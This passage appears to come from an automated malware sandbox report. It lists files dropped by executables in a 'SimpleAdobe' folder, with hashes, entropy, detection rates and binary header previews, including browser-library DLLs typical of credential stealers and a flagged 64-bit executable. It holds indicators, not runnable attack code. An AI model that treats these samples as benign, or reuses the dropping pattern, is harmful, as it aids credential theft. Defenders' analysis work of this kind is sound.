,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF001.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6972962136004717
Encrypted:	false
SSDEEP:	96:TiZYW81u8/YMYtoWQLHzYEZ+gtDiOL7PVHwHjI7aqfaJMM6eSIu10:2ZDWbK73k7aqiiM6e1u10
MD5:	03F474CE9D238DDC7535AA43FEDB037B
SHA1:	5155CF753AD7600F62029EE08E8DDC6B24E7F4F4
SHA-256:	7863630AE00820833E131E346B78CC484EA2728280E25F04A8EB9B2F94226349
SHA-512:	A647960884D1A1F89F3F477E96A9822023172B2D44C5F627E148B54C1CD4DC1C773B81644971BB0DA8C7A071472ED730C021AB1A95F01F0A5B24F64FEDCB146D
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\NHPKIZUUSG.docx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Reputation:	unknown
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\ProgramData\NHPKIZUUSG.xlsx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Reputation:	unknown
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\ProgramData\QNCYCDFIJJ.xlsx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Reputation:	unknown
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\ZBEDCJPBEY.docx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Reputation:	unknown
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\ProgramData\ZBEDCJPBEY.xlsx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Reputation:	unknown
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\ProgramData\ZSSZYEFYMU.docx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Reputation:	unknown
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11214848
Entropy (8bit):	7.97772484802616
Encrypted:	false
SSDEEP:	196608:oPnV1Bk/fRaGxUCBIORz5Z2YoZX0tMmp6tgq1D//XxdgPxwdT:oPKfR/UCBF+dZX0tMft/vxdgpG
MD5:	B091C4848287BE6601D720997394D453
SHA1:	9180E34175E1F4644D5FA63227D665B2BE15C75B
SHA-256:	D0B06CA6ECE3FEF6671FA8ACD3D560A9400891ABCD10F5CEDCFE7BD1E6050DFE
SHA-512:	A3B3663FD343389AEE2CBF76F426401D436992B2B56CEA3B60E9C2E385510FA874FA45B2AC75703074F0303934C4223EAEE1983851374A2E753FD0302042CC5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 66%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....L.f..........#.................y..........@.............................@............ ...................................................f.d.......X,..`...*...........................................v..(... ..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...h...........................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...4+......................... ..`.text1..8...........................@....text2..\... .....................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HTML Professional Kit\htmlprofessionalkit.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1740576
Entropy (8bit):	7.1069858074264145
Encrypted:	false
